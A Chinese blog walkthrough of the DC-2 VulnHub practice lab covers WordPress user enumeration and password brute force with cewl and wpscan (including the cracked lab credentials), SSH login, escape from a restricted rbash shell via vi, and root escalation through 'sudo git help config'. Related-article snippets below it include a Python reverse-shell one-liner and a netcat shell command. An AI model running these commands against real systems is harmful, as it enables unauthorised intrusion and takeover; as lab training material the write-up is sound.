DC-2渗透笔记SUID-git提权

最新推荐文章于 2025-04-13 13:37:08 发布
原创 最新推荐文章于 2025-04-13 13:37:08 发布 · 246 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

信息搜集

  • 首先,发现主机

  • 先扫描一下端口:

  • 7744:开放ssh连接,后面做题要注意

    访问一下主页:

  • 先使用御剑扫描一下:(找不到什么太有用的东西)

  • 再使用dirb扫描一下网址:

  • 在其中,可以看到有一个admin:

  • 访问一下,找到一个登录入口,先留着

  • 到此信息搜集先告一段落

  • 登录后台

  • 注意到当前首页直接就有一个flag;点开看看:(我这里是翻译了一下)

  • 根据提示得知要使用cewl来爬取网站的密码;

    来到kali来爬取一下密码:

  • 一般爬取结束后也不会有什么回显,自己到对应的文件里去看看有没有成功爬取到密码

    这样就是成功了,

  • 有了密码,还要有账号来爆破,习惯性看看指纹识别,

  • 发现是wordpress,就使用与之对应的扫描器来扫描:
wpscan --url http://dc-2/ -e u

成功拿到三个用户名,接下来为了方便,直接讲=将这三个用户名写在一个文档中:

直接用之前的wpscan结合之前cewl拿到的密码来试着爆破一下:

wpscan --url http://dc-2/ -U user-for-dc-2.txt -P 9.txt

看到成功破解出两个账户:

[SUCCESS] - jerry / adipiscing                                                           
[SUCCESS] - tom / parturient

回想到之前的登录页面,去试试看能不能登录成功:

使用jerry那个用户即登录成功

在Pages模块下可以找到flag2

Getshell

同时,前面端口也扫描出了7744端口(ssh连接),直接用这两个账户去连接登录:

ssh jerry@192.168.134.129 -p 7744

但是很奇怪,jerry怎么都登录不进去,不要急,试试tom:

是可以发现tom这个账户是可以直接登录的

ssh tom@192.168.134.129 -p 7744

之后就是简单的查看目录找flag:

发现cat命令被禁止了;尝试了一下其他基础命令,发现连cd也用不了,那就先来看看有什么可以使用的命令:

compgen -c       //查看可以使用的指令

可以看到最底下有一个vi文本编辑的命令,也可以用它来查看flag3.txt

成功拿到flag3,根据提示以及之前登录的情况,此时是再tom这个目录下,刚才也是,只有tom这个账号才可以ssh远程登录,所以,接下来应该就是要追着“杰瑞”,也就是切换到jerry目录下→部分提权

部分提权-rbash
方法1

cd 之后发现命令被限制了,但是也给出了提示:rbash,所以想到rbash逃逸:

vi 命令进入刚才的flag3.txt文件:

:set shell=/bin/bash

直接Enter继续:

:shell

此时使用whoami还是会显示:command not found

只需要再添加两条路径就可以了:

export PATH=$PATH:/bin/
 
export PATH=$PATH:/usr/bin/

之后就可以看到whoami,cd,cat,等基础命令就都是可以使用的了

直接就切换到/home/jerry目录下去读取flag4.txt

方法2:

一样,靠我们仅有的vi命令来部分提权:

首先;还是使用vi命令进入一个文件中去做修改:

:set shell=/bin/sh

直接Enter继续;

:shell

之后,最重要的一步,一样是添加环境变量:

export PATH=/usr/sbin:/usr/bin:/sbin:/bin

一样达到方法1的/bin/bash部分提权的效果

git提权

之后,根据flag4.txt的提示说,只有最后一个flag了,也给了提示要使用git提权

来试试看:

先看看什么命令拥有sudo权限:

发现tom用户没法使用,那就换到jerry用户

再次验证可以使用git提权;

首先:

sudo git help config


!/bin/bash
!'sh'
两个都可以

Enter之后,就可以看到是root权限了

直接切换到/root目录下获取flag就好

完成

2021-8-8git
qq_45290991的博客
08-08 692
一般在linux下,如果发现sudo -l之后可以用git的话,就用这个: 基本原理应该是git配置不当存在溢出,溢出的部分如果输入一个交互式窗口就会有交互,类似于suid那样,暂时拥有root,又写了一个交互,就真的有了root的交互: 1. 直接输入!/bin/bash然后回车即可 2. 同理 3. sudo git -p help config 然后同理 ...
DC-2靶机(ssh远程SUID(VIM)
JyajT的博客
04-23 375
dc系列
git
longwanlian的博客
01-19 1115
输入sudo git help config后会有一个很长的文本,在此基础上,按下: ,在输入!然后按q退出,再输出sudo git -p help命令,同上输入!前:用户可以使用sudo中git限。可以发现git命令存在sudo
git方法
G_Fu_Q的博客
04-29 3710
当我们拿到系统的限的时候,发现限太低,很多命令执行不了的时候,我们应该怎样呢 下面我将介绍一个git的方法 前是执行sudo -l 示不需要密码可以使用git命令 下面将示两种方法 1、sudo git help config #在末行命令模式输入 !/bin/bash 或 !'sh' #完成 2、sudo git -p help !/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell ...
网安笔记——的各种姿势
qq_64875725的博客
09-13 568
SUID的思路就是运行root用户所拥有的SUID的文件,当其他用户运行该文件的时候就得获得root用户的身份。1、使用find命令查看拥有suid限的文件2、使用exec查看当前用户,text必须是可以找到的文件名,不然会出错,3、然后使用find命令来
DC系列之DC-1渗透测试
qq_45392044的博客
12-23 1152
例如:当spider访问一个网站(http://www.xxx.com)时,首先会检查该网站中是否存在http://www.xxx.com/robots.txt这个文件,如果 Spider找到这个文件,它就会根据这个文件的内容,来确定它访问限的范围。如果有一些命令具有suid标志,说明这个命令在执行的过程中,会短暂的获得(其实不短暂)root限,如果我们通过这些拥有suid标志的命令去调用bash的话,这个bash也会继承suid限,也就会继承root限。那我们怎么去寻找有suid标识的命令呢?
渗透测试综合靶场 DC-2 通关详解
goldfish8848的博客
09-18 1703
DC-2DC-1的渗透步骤有一些相似之处,但也存在一些区别。靶机发现与IP解析DC-2:发现靶机真实IP后,需要修改hosts文件以解析域名到IP地址,因为直接访问IP时域名解析失败。DC-1:没有到需要修改hosts文件,直接通过IP进行渗透测试。端口探测DC-2:探测到除了常见的80端口外,还有一个7744端口开放。DC-1:主要到了22和80端口,没有到7744端口。网站配置与访问DC-2:需要修改hosts文件后才能访问网站,且网站是基于WordPress的。
WEB渗透Linux-SUID
qq_59468567的博客
09-06 397
$touch xxx $/usr/bin/find xxx –exec whoami \; $/usr/bin/find xxx –exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.filen
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3820
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
2022-渗透测试-git(Linux)
保持微笑的博客
02-02 4475
目录 1.什么是 2.git命令 3.git的使用 1.什么是 就是通过各种办法和漏洞,高自己在服务器中的限,以便控制全局。利用漏洞的最终目的是获取被测系统的最高限,即Windows中管理员账户的限,或Linux中root账户的限。 2.git命令 sudo git help config !/bin/bash或者!'sh'完成 sudo git -p help !/bin/bash 3.git的使用 这里以DC-2靶场为例。 .
DC-2(VI GIT)
E1even的博客
08-25 1024
文章目录扫描网段内存活主机及其开放端口FLAG1:访问即可FLAG2:使用工具爆破用户密码FLAG3:SSH登录并绕过rbash限制FLAG4:VIFLAG5:GIT kali攻击????:192.168.78.131 目标主机:192.168.78.xxx 环境配置参照DC-1 扫描网段内存活主机及其开放端口 使用命令查询主机所在网段 ifconfig 得到网段192.168.78.xxx,扫描该网段内其他存活的主机 nmap -sP 192.168.78.0/24 发现192.168.
git以及防护措施
最新发布
weixin_74778939的博客
04-13 549
(例如通过 sudo 或 setuid),则可能通过。在Linux系统中,如果普通用户能以。参数运行 shell 命令,如果。写入一个 UID=0 的用户)获取完整的 root 限。等文件,就可以添加一个新的。则说明该用户可以无密码地以。执行 shell 命令)
DC2靶场
m0_62438849的博客
03-04 605
int *p1,*p2,*p,a,b;//*表示定义了指针变量p1,p2和p scanf("%d %d",&a,&b); p1=&a;//把a的地址赋值给指针变量 p2=&b; p=p1;//
Vulnhub DC-2靶机练习 shell限制绕过 sudo-git
qq_43232893的博客
10-16 545
Vulnhub DC-2靶机练习 git说明主机发现端口扫描访问80端口开启的页面就可以发现flag1获取flag1之后示需要登录,这时我们用到nikto工具扫描敏感目录发现是WordPress的博客网站这里使用wpscan工具获取用户接下来生成密码字典,用到cewl工具密码字典有了就可以用wpscan工具对账号密码进行爆破远程ssh连接绕过shell限制获取root限 说明 kali攻击机IP:192.168.255.139 靶机IP:192.168.255.144 靶机下载地址 主机发现 端口
各种总结
05-10 1561
需要知道的一些小常识:serv-u自带后门 关键文件 servuadmin.exe或servuadmin.iniserv -u 后门 端口 65500 go od serv-u 6.1open IP 65500一些限比较大的,但是直接net加个用户没成功 应该考虑到用户策略组的密码14位的限制system32/boot.dat 里面记录3389登录解决终端mstsc /console /v:
获取Git限的三种方式
爬楼的猪的博客
01-09 6424
获取Git限的三种方式
靶场总结
devil8123665的博客
07-21 2748
1 find root find / -perm -u=s -type f 2>/dev/null 查看find限 find /var/www/index.php -exec whoami \; 返回为“root” 设置nc 反弹shell find /var/www/index.php -exec nc -lvp 9999 -e /bin/sh \; 2 exim4 find / -perm -u=s -type f 2>/dev/null 找到root
记录靶机渗透中用到的方法
Yaphst的博客
03-15 5769
1、find (1)首先使用如下命令查看具有suid 限的可执行二进制程序 find / -perm -4000 -type f 2>/dev/null 或 find / -perm -u=s -type f 2>/dev/null 参数含义参考find基础命令 -perm:按照文件限来查找文件,4000,2000,1000为分别表示SUID,SGID,SBIT,如777为普通文件的最高限,7000为特殊文件的最高-type:d(目录)f(文件)c(字符设备文件)b(块设备文
sudo git help config原理
04-03
<think>好的,我现在需要分析通过'sudo git help config'实现的原理。首先,我应该理解这个命令为什么会存在漏洞。根据用户供的引用,例如引用[2]和[5]到,执行sudo git help config后,输入!/bin/bash或!'sh'可以完成。这表明在某种情况下,用户可以通过Git的帮助页面执行任意命令。 接下来,我需要了解sudo的作用。sudo允许用户以其他限(通常是root)执行命令。如果用户被授以sudo运行git,那么当执行sudo git help config时,Git会调用帮助页面查看器,通常是分页程序如less或more。这里的关键点在于,这些分页程序允许用户在查看文档时执行shell命令。例如,在less中,输入!后跟命令会执行该命令,而此时的限是继承自sudo的,即root限。因此,当用户运行sudo git help config时,Git启动帮助文档并通过分页程序显示,用户在此界面输入!/bin/bash就会以root限启动一个shell,从而实现。 另外,引用[5]到第二种方法是使用sudo git -p help !/bin/bash,这里利用了Git-p参数,可能是指定分页程序,或者触发某种交互模式,直接执行后续的命令。但通常,-p在Git中用于分页,所以可能仍然是利用分页程序的功能执行命令。 需要确认的是,为什么Git的帮助页面允许执行shell命令。这应该与分页程序的功能有关,而不是Git本身的问题。因此,漏洞的关键在于配置了sudo限允许用户以root运行git,而Git调用的分页程序允许执行shell命令,且这些命令继承了root限。因此,防范措施包括限制用户通过sudo运行git,或者配置分页程序禁止执行shell命令。 总结来说,的原理是利用了sudo授git命令调用分页程序,而分页程序允许执行任意命令,这些命令以root限运行。这属于配置不当导致的升漏洞。</think>### 通过 `sudo git help config` 漏洞的原理分析 #### 1. **漏洞背景** 该漏洞的核心在于 **`sudo` 限配置不当**与 **分页程序(如 `less`)的交互功能**的结合。当用户被允许通过 `sudo` 以高限(如 `root`)执行 `git` 命令时,若未对分页程序进行安全限制,攻击者可通过分页程序的命令执行功能实现升。 #### 2. **关键步骤与原理** - **步骤 1:`sudo` 限授予** 假设用户被授予以下限(通过 `sudoers` 文件): ```bash test01 ALL=(ALL) NOPASSWD: /usr/bin/git ``` 这意味着用户 `test01` 可以无密码通过 `sudo` 执行 `git` 命令,且继承 `root` 限[^3][^5]。 - **步骤 2:触发分页程序** 执行 `sudo git help config` 时,`git` 会调用默认的分页程序(如 `less`)显示帮助文档。此时,分页程序以 `root` 限运行[^2][^4]。 - **步骤 3:分页程序的命令执行功能** 分页程序 `less` 支持在界面中直接执行 Shell 命令。输入 `!` 后跟命令(如 `!/bin/bash`)时,`less` 会启动一个新的 Shell 进程,**继承当前分页程序的限(即 `root`)**。 - **步骤 4:获取高限 Shell** 通过上述操作,用户将获得一个 `root` 限的 Shell,从而完成[^3]。 #### 3. **技术细节** - **分页程序的安全缺陷** `less` 和 `more` 等分页程序默认允许执行 Shell 命令,若未通过环境变量(如 `LESS=-X`)禁用交互功能,则会保留此行为。 - **`sudo` 的限继承** `sudo` 执行的命令及其子进程(如分页程序)默认继承相同限。若未限制子进程的行为,则可能引发漏洞。 #### 4. **漏洞复现示例** ```bash # 以普通用户执行 sudo git help config # 进入 less 界面后输入以下命令 !/bin/bash # 此时已切换至 root Shell whoami # 输出 root ``` #### 5. **防御措施** - **限制 `sudo` 限** 避免普通用户通过 `sudo` 无限制执行 `git` 命令,例如仅允许特定子命令[^1]。 - **禁用分页程序的命令执行** 在 `sudoers` 中配置 `git` 命令时,添加环境变量限制: ```bash Defaults env_keep += "LESS" ``` 或强制禁用交互功能: ```bash sudo git help config --no-pager # 直接输出内容,不启动分页程序 ``` - **更新安全策略** 使用最新版本的 `sudo` 和分页程序,并遵循最小限原则。 #### 6. **类似漏洞场景** - 其他允许通过 `sudo` 执行且调用分页程序的命令(如 `man`、`systemctl`)也可能存在类似风险。 - 攻击者可利用 `sudo -l` 查看用户的限配置,寻找类似入口点。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值